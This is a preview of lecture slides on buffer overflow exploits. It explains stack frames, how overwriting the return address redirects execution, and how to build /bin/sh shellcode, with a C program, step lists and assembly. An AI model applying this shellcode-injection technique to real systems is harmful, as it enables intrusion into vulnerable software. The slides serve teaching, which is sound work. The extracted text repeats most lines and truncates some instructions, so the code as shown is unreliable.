Docsity
Docsity

Prepare for your exams
Prepare for your exams

Study with the several resources on Docsity


Earn points to download
Earn points to download

Earn points by helping other students or get them with a premium plan


Guidelines and tips
Guidelines and tips

buffer overflow attacks, Exams of Network security

buffers different types of buffers

Typology: Exams

2017/2018

Uploaded on 07/13/2018

haritha-reddy-1
haritha-reddy-1 šŸ‡®šŸ‡³

3 documents

1 / 49

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
Exploits
Exploits
By Hon Ching Lo
By Hon Ching Lo
pf3
pf4
pf5
pf8
pf9
pfa
pfd
pfe
pff
pf12
pf13
pf14
pf15
pf16
pf17
pf18
pf19
pf1a
pf1b
pf1c
pf1d
pf1e
pf1f
pf20
pf21
pf22
pf23
pf24
pf25
pf26
pf27
pf28
pf29
pf2a
pf2b
pf2c
pf2d
pf2e
pf2f
pf30
pf31

Partial preview of the text

Download buffer overflow attacks and more Exams Network security in PDF only on Docsity!

Exploits

Exploits

By Hon Ching Lo

By Hon Ching Lo

Buffer Overflow

Buffer Overflow

Virus & Worms

Virus & Worms

The ā€œstacheldrahtā€

The ā€œstacheldrahtā€

distributed denial of

distributed denial of

service attack tool

service attack tool

Stack Basics

Stack Basics



A stack is contiguous block of memory containing

A stack is contiguous block of memory containing

data.

data.



Stack pointer (SP) – a register that points to the

Stack pointer (SP) – a register that points to the

top of the stack.

top of the stack.



The bottom of the stack is at fixed address.

The bottom of the stack is at fixed address.



Its size is dynamically adjusted by kernel at run

Its size is dynamically adjusted by kernel at run

time.

time.



CPU implements instructions to PUSH onto and

CPU implements instructions to PUSH onto and

POP off the stack.

POP off the stack.

Stack Basics

Stack Basics



A stack consists of logical stack

A stack consists of logical stack

frames that are pushed when

frames that are pushed when

calling a function and popped when

calling a function and popped when

returning.

returning. Frame pointer (FP) – points to a

Frame pointer (FP) – points to a

fixed location within a frame. fixed location within a frame.



When a function is called, the

When a function is called, the

return address, stack frame pointer

return address, stack frame pointer

and the variables are pushed on

and the variables are pushed on

the stack (in that order).

the stack (in that order).



So the return address has a higher

So the return address has a higher

address as the buffer.

address as the buffer.



When we overflow the buffer, the

When we overflow the buffer, the

return address will be overwritten.

return address will be overwritten.

High memory

addresses

Lower memory

addresses

Another Example Code

Another Example Code

void function(int a, int b, int c) {

void function(int a, int b, int c) {

char buffer1[5];

char buffer1[5];

char buffer2[10];

char buffer2[10];

}

}

void main(){

void main(){

function(1,2,3);

function(1,2,3);

}

}

Stack layout for the example code

Stack layout for the example code

bottom of

bottom of top of

top of

memory

memory memory

memory

buffer

buffer buffer1 sfp ret a b c

buffer1 sfp ret a b c

<------ [ ][ ][ ][ ][ ][ ][ ]

<------ [ ][ ][ ][ ][ ][ ][ ]

Top of stack

Top of stack bottom of

bottom of

stack

stack

How can we place arbitrary

How can we place arbitrary

instruction into its address space?

instruction into its address space?



 place the code that you are trying to

place the code that you are trying to

execute in the buffer we are

execute in the buffer we are

overflowing, and overwrite the return

overflowing, and overwrite the return

address so it points back into the

address so it points back into the

buffer.

buffer.

bottom of

bottom of top of

top of

memory

memory memory

memory

DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF

DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF

89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF

89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF

buffer

buffer sfp ret a b c

sfp ret a b c

<---- [SSSSSSSSSSSSSSSSSSS] [SSSS][0xD8][0x01][0x02][0x03]

<---- [SSSSSSSSSSSSSSSSSSS] [SSSS][0xD8][0x01][0x02][0x03]

^

^

|____________________________|

|____________________________|

top of

top of bottom of

bottom of

stack

stack stack

stack

We want:

We want:

(iii) executing the attack code

Shellcode.c

Shellcode.c

#include<stdio.h>

#include<stdio.h>

void main() {

void main() {

char *name[2];

char *name[2];

name[0] = "/bin/sh";

name[0] = "/bin/sh";

name[1] = NULL;

name[1] = NULL;

execve(name[0], name, NULL);

execve(name[0], name, NULL);

}

}

Some modifications to the

Some modifications to the

shellcode:

shellcode:

We want the program to exit cleanly if the execve

We want the program to exit cleanly if the execve

syscall fails. We add exit(0); as the last line in the

syscall fails. We add exit(0); as the last line in the

code.

code.

Our list of steps:

Our list of steps:



Have the null terminated stringHave the null terminated string

"/bin/sh" somewhere in memory.

"/bin/sh" somewhere in memory.



Have the address of the string

Have the address of the string

"/bin/sh" somewhere in memory

"/bin/sh" somewhere in memory

followed by a null long word. followed by a null long word.



Copy 0xb into the EAX register.Copy 0xb into the EAX register.



Copy the address of the address ofCopy the address of the address of

the string "/bin/sh" into the EBX

the string "/bin/sh" into the EBX

register.

register.



Copy the address of the string

Copy the address of the string

"/bin/sh" into the ECX register. "/bin/sh" into the ECX register.



Copy the address of the null longCopy the address of the null long

word into the EDX register.

word into the EDX register.



Execute the int $0x80 instruction.Execute the int $0x80 instruction.



Copy 0x1 into the EAX register.Copy 0x1 into the EAX register.



Copy 0x0 into the EBX register.Copy 0x0 into the EBX register.



Execute the int $0x80 instruction.Execute the int $0x80 instruction.

Trying to put this together in

Trying to put this together in

Assembly language

Assembly language , we have:

, we have:

movl string_addr,string_addr_addr

movl string_addr,string_addr_addr

movb $0x0,null_byte_addr

movb $0x0,null_byte_addr

movl $0x0,null_addr

movl $0x0,null_addr

movl $0xb,%eax

movl $0xb,%eax

movl string_addr,%ebx

movl string_addr,%ebx

leal string_addr,%ecx

leal string_addr,%ecx

leal null_string,%edx

leal null_string,%edx

int $0x

int $0x

movl $0x1, %eax

movl $0x1, %eax

movl $0x0, %ebx

movl $0x0, %ebx

int $0x

int $0x

/bin/sh string goes here.

/bin/sh string goes here.

Then, place the string after

the code.

Inserting JMP and CALL instructions

Inserting JMP and CALL instructions

bottom of

bottom of top of

top of

memory

memory memory

memory

DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF

DDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF

89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF

89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF

buffer

buffer sfp ret a b c

sfp ret a b c

<---[JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03] ^|^

<---[JJSSSSSSSSSSSSSSCCss][ssss][0xD8][0x01][0x02][0x03] ^|^

^| |

^| |

|||_______________| |__________| (1)

|||_______________| |__________| (1)

(2)

(2) ||_______________| |

||_______________| |

|_________________| (3)

|_________________| (3)

top of stack

top of stack bottom of stack

bottom of stack

Running the shellcode

Running the shellcode

We must place the code we wish to

We must place the code we wish to

execute in the stack or data segment.

execute in the stack or data segment.

(Recall: text region of a process is

(Recall: text region of a process is

marked read-only)

marked read-only)

To do so, we’ll place our code in a global

To do so, we’ll place our code in a global

array in the data segment. We need hex

array in the data segment. We need hex

representation of the binary code.

representation of the binary code.